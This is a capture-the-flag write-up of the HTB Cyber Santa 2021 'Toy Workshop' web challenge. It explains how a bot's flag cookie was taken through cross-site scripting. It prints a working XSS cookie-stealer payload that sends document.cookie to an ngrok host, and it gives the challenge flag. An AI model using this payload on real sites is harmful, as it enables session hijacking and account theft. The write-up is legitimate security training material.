According to the index.js in challenges/routes, we can do a POST request on /api/submit with a query in the body.


I did so and I get the message that it was successful.


The website looks like this:


Clicking on the back of the elves, makes a window pop-up where we can send the post request mentioned in the source code:


The bot.js file source code looks like this: It seems to be accessing the queries page which is where we send our post request message and he has a cookie which is the flag itself.


We can't go to the queries page because only localhost can do that.


I disabled that filter on my local instance so that I can see the output of our messages. Tried XSS and saw that it is triggered. Using the syntax below, we were able to get our fake flag after setting up a http python server and ngrok. Basically I was able to steal the cookie via xss.


XSS Cookie Stealer payload:

```javascript
<script type="text/javascript">document.location="http://a417-2a02-2f0e-de00-fa00-b2bc-3b79-670f-3c60.ngrok.io/?c="+document.cookie;</script>
```

Re-ran the same syntax on the remote instance and got the legit flag. I didn't need to bypass the localhost filter at all.

HTB{3v1l_3lv3s_4r3_r1s1ng_up!}

Original writeup (https://github.com/LazyTitan33/CTF-Writeups/blob/main/HTB%20-%20Cyber%20Santa%20is%20Coming%20to%20Town%202021/Web/Toy%20Workshop.md).